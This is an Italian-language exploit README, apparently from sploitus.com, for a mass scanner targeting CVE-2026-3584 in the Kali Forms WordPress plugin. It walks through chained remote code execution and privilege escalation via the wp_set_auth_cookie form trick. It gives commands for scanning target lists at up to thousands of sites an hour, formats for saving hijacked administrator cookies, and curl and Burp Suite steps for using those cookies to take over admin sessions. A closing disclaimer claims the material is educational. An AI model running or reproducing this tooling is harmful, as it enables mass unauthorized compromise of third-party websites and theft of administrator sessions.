Share
## https://sploitus.com/exploit?id=F82B5EC8-DE6E-5E9A-AA0F-305DA9C41A20
# CVE-2026-3584 – WordPress Kali Forms 10000 e 'PHP Version' presente
# Salva HTML completo per analisi
```
**6. Test Escalation Privilegi**
```python
def test_privilege_escalation_fast(self, target, nonce, user_ids, post_ids):
# Strategia intelligente:
# 1. Cerca sovrapposizioni user_id/post_id
# 2. Testa prima ID con alta probabilità successo
# 3. Fallback su ID comuni: 1,2,3,4,5
# Per ogni formId candidato:
# POST data[entryCounter]=wp_set_auth_cookie
# Estrae cookie: wordpress_logged_in + wordpress_sec
# Verifica: GET /wp-admin/ → no redirect
# Controlla: 'dashboard' in response
```
**7. Multi-Threading**
```python
# ThreadPoolExecutor per elaborazione parallela
# Thread-safe locks per scrittura risultati
# Salvataggio real-time (append mode)
# Statistiche globali con sync
```
**8. Sistema di Backup Automatico**
```python
def backup_previous_results(self):
# Prima di ogni scan:
# result_phpinfo.txt → result_phpinfo.txt.20260325_120000.backup
# result/ → result.20260325_120000.backup/
# result_cookie/ → result_cookie.20260325_120000.backup/
# Preserva tutti i dati storici
```
---
## 🚀 **Utilizzo del Mass Scanner**
### **Requisiti**
```bash
pip3 install requests beautifulsoup4
```
### **Preparazione File Obiettivi**
Creare un file `targets.txt` con un obiettivo per riga (http/https opzionale):
```
example.com
wordpress.site
192.168.1.100
http://blog.example.org
https://secure.site.com:8080
```
### **Esecuzione Base**
```bash
# Scansione con impostazioni predefinite (20 thread)
python3 mass_scanner.py targets.txt
# Scansione con thread personalizzati
python3 mass_scanner.py -t 10 targets.txt
# Scansione con numero massimo di thread
python3 mass_scanner.py --threads 50 targets.txt
```
### **Output durante la Scansione**
```
======================================================================
SCANNER DI MASSA - CVE-2026-3584 Pipeline Completa
======================================================================
Obiettivi: 100
Thread: 20
Pipeline: Ricognizione → Scoperta Moduli → RCE → Escalation Privilegi
======================================================================
[*] Risultati precedenti salvati in: result_phpinfo.txt.20260325_120000.backup
[04:38:28] [INFO] https://target1.com: Avvio scansione...
[04:38:28] [INFO] https://target1.com: Fase 1: Enumerazione API REST...
[04:38:29] [INFO] https://target1.com: Trovati 3 utenti via API
[04:38:29] [INFO] https://target1.com: Trovati 5 post via API
[04:38:29] [INFO] https://target1.com: Fase 2: Scoperta moduli...
[04:38:31] [INFO] https://target1.com: Trovate 8 pagine con moduli
[04:38:31] [INFO] https://target1.com: Fase 3: Test RCE...
[04:38:31] [INFO] https://target1.com: Test modulo/i [1, 2, 3] con nonce 46aedbd3...
[04:38:32] [SUCCESS] https://target1.com: RCE SUCCESSO sul modulo 1!
[04:38:32] [INFO] https://target1.com: Salvato phpinfo in result/target1.com_form1_phpinfo.html
[04:38:32] [INFO] https://target1.com: Fase 4: Test escalation privilegi...
[04:38:33] [CRITICAL] https://target1.com: ESCALATION PRIVILEGI RIUSCITA con formId=1!
[04:38:33] [INFO] https://target1.com: Cookie salvato in result_cookie/target1.com.txt
[04:38:35] [INFO] https://target2.com: Avvio scansione...
[04:38:36] [INFO] https://target2.com: Fase 1: Enumerazione API REST...
[04:38:37] [WARN] https://target2.com: Nessun Kali Forms trovato
...
======================================================================
STATISTICHE SCANSIONE
======================================================================
Obiettivi totali: 100
Scansionati: 100
Vulnerabili: 45
- Solo RCE: 10
- Escalation Priv (CVSS10): 35
Falliti: 55
======================================================================
Risultati salvati:
- result_phpinfo.txt (RCE riuscito)
- result_yes_all.txt (RCE + Escalation Privilegi)
- result/*.html (Output phpinfo)
- result_cookie/*.txt (Richieste HTTP con cookie amministrativi)
======================================================================
```
### **Interpretazione dei Livelli di Log**
- **[INFO]** - Informazioni generali sul progresso della scansione
- **[SUCCESS]** - RCE confermato, codice eseguito con successo
- **[CRITICAL]** - Escalation privilegi riuscita, accesso amministratore ottenuto
- **[WARN]** - Target non vulnerabile o moduli non trovati
- **[ERROR]** - Errore durante la scansione (timeout, connessione, ecc.)
### **Struttura dei Risultati**
```
/root/
├── result_phpinfo.txt # Lista obiettivi con RCE confermato
├── result_yes_all.txt # Lista obiettivi con accesso admin completo
├── result/ # File HTML phpinfo dettagliati
│ ├── target1.com_form1_phpinfo.html
│ ├── target2.org_form2_phpinfo.html
│ └── ...
└── result_cookie/ # Richieste HTTP con cookie amministrativi
├── target1.com.txt
├── target2.org.txt
└── ...
```
### **Formato result_phpinfo.txt**
```
https://target1.com | Modulo: https://target1.com/contact | ID Modulo: 1 | Nonce: 46aedbd358 | File: result/target1.com_form1_phpinfo.html
https://target2.org | Modulo: https://target2.org/form | ID Modulo: 2 | Nonce: abc123def4 | File: result/target2.org_form2_phpinfo.html
```
### **Formato result_yes_all.txt**
```
======================================================================
OBIETTIVO: https://target1.com
TIMESTAMP: 2026-03-25T04:38:33.123456
======================================================================
RCE: SUCCESSO
URL Modulo: https://target1.com/contact
ID Modulo: 1
Nonce: 46aedbd358
phpinfo: result/target1.com_form1_phpinfo.html
ESCALATION PRIVILEGI: SUCCESSO (CVSS 10.0)
Exploit formId: 1
Cookie: wordpress_logged_in_xxx=...; wordpress_sec_xxx=...
File Cookie: result_cookie/target1.com.txt
Impatto: Accesso amministrativo completo
COMANDI DI SFRUTTAMENTO:
Test RCE:
python3 baru_cve_nih.py https://target1.com/contact 1 46aedbd358
Escalation Privilegi:
python3 POC_privilege_escalation_v3.py https://target1.com 46aedbd358
======================================================================
```
### **Formato result_cookie/target.txt**
```
GET /wp-admin/ HTTP/1.1
Host: target.com
Cookie: wordpress_logged_in_xxx=admin%7C1774600707%7C...; wordpress_sec_xxx=admin%7C1774600707%7C...
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0) Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it,en-US;q=0.9,en;q=0.8
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
```
Questo formato è pronto per essere copiato e incollato direttamente in Burp Suite Repeater o utilizzato con curl.
### **Utilizzo dei Cookie Amministrativi**
**Metodo 1: Test con curl**
```bash
# Estrarre cookie dal file
COOKIE=$(grep "^Cookie:" result_cookie/target.com.txt | sed 's/^Cookie: //')
# Testare accesso amministrativo
curl -H "Cookie: $COOKIE" https://target.com/wp-admin/ | grep -i dashboard
# Se output contiene "Dashboard" → Cookie funzionante!
```
**Metodo 2: Utilizzo in Burp Suite**
```bash
# Passo 1: Generare configurazione automatica (opzionale)
./burp_config_gen.sh result_cookie/target.com.txt
# Passo 2: Burp Suite → Proxy → Options → Match and Replace → Add
# Passo 3: Configurazione:
Type: Request header
Match: ^Cookie:.*$
Replace: Cookie: [INCOLLA_COOKIE_DA_FILE]
☑ Regex match
# Passo 4: Abilitare la regola (checkbox)
# Passo 5: Navigare a https://target.com/wp-admin/
# Risultato: Accesso amministratore immediato
```
### **Monitoraggio Real-Time**
Durante la scansione, è possibile monitorare i risultati in tempo reale:
```bash
# Terminal 1: Esegui scanner
python3 mass_scanner.py targets.txt
# Terminal 2: Monitora risultati RCE
watch -n 2 'tail -20 result_phpinfo.txt'
# Terminal 3: Monitora escalation privilegi
watch -n 2 'tail -20 result_yes_all.txt'
# Terminal 4: Conta obiettivi vulnerabili
watch -n 5 'echo "RCE: $(wc -l < result_phpinfo.txt) | Admin: $(grep -c "ESCALATION PRIVILEGI: SUCCESSO" result_yes_all.txt)"'
```
### **Backup Automatico**
Prima di ogni nuova scansione, lo scanner esegue automaticamente il backup dei risultati precedenti:
```
Scansione 1: [12:00]
result_phpinfo.txt
result_yes_all.txt
result/
result_cookie/
Scansione 2: [13:00] - Backup automatico!
[*] Risultati precedenti salvati in: result_phpinfo.txt.20260325_120000.backup
[*] Risultati precedenti salvati in: result_yes_all.txt.20260325_120000.backup
[*] File phpinfo precedenti salvati in: result.20260325_120000.backup/
[*] File cookie precedenti salvati in: result_cookie.20260325_120000.backup/
Tutti i dati precedenti sono preservati con timestamp!
```
### **Ottimizzazione delle Prestazioni**
**Thread Count Raccomandati:**
```bash
# Rete veloce, molti obiettivi
python3 mass_scanner.py -t 50 targets.txt
# Rete media, obiettivi moderati
python3 mass_scanner.py -t 20 targets.txt # (predefinito)
# Rete lenta o pochi obiettivi
python3 mass_scanner.py -t 10 targets.txt
# Test singolo (debug)
python3 mass_scanner.py -t 1 targets.txt
```
**Performance Expected:**
- **20 thread:** ~500-1000 obiettivi/ora (dipende dalla rete)
- **50 thread:** ~1000-2000 obiettivi/ora (rischio timeout aumentato)
- **10 thread:** ~300-500 obiettivi/ora (più stabile)
### **Risoluzione Problemi Comuni**
**Problema: Nessun obiettivo vulnerabile trovato**
```bash
# Verifica manuale che il sito abbia Kali Forms
curl -s https://target.com | grep -i "kaliforms"
# Se trovato, estrai nonce manualmente
curl -s https://target.com | grep -i "KaliFormsObject"
```
**Problema: Timeout frequenti**
```bash
# Riduci numero di thread
python3 mass_scanner.py -t 5 targets.txt
# O aumenta timeout modificando il codice (timeout=10 → timeout=30)
```
**Problema: Cookie non funziona**
```bash
# Verifica validità cookie
python3 test_burp_persistent.sh http://target.com
# Se fallisce, rigenera cookie con:
python3 get_fresh_admin_cookie.py http://target.com [NONCE]
```
---
## 🔒 **Avvertenza Legale**
**âš ï¸ IMPORTANTE:**
Queste informazioni e strumenti sono forniti **esclusivamente per scopi educativi e di test di sicurezza autorizzato**.
- ✅ **Utilizzo Legale:** Test di penetrazione autorizzato, ricerca sulla sicurezza, formazione
- ⌠**Utilizzo Illegale:** Accesso non autorizzato a sistemi, compromissione di siti senza permesso
**L'accesso o l'utilizzo non autorizzato di sistemi informatici è illegale e non etico.**
Gli autori e i contributori di questo repository non sono responsabili per qualsiasi uso improprio o danno causato da questi strumenti. Gli utenti sono responsabili di garantire di avere l'autorizzazione appropriata prima di testare qualsiasi sistema.
**Utilizzare in modo responsabile e solo con esplicita autorizzazione scritta.**
---
## 📚 **Riferimenti**
**CVE e Advisory:**
- CVE-2026-3584: Kali Forms RCE e Escalation Privilegi
- Link: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
- CVSS Score: 10.0 (Critico)
- CWE-94: Improper Control of Generation of Code ('Code Injection')
- CWE-862: Missing Authorization
**Plugin Vulnerabile:**
- Nome: Kali Forms – WordPress Form Builder
- Slug: kaliforms
- Repository: https://wordpress.org/plugins/kaliforms/
- Versioni Vulnerabili: <= 2.4.9
---
**CVE-2026-3584 | Kali Forms <= 2.4.9 | CVSS 10.0 Critical**
*Ricerca sulla Sicurezza | Sfruttamento Responsabile | Educazione alla Sicurezza Informatica*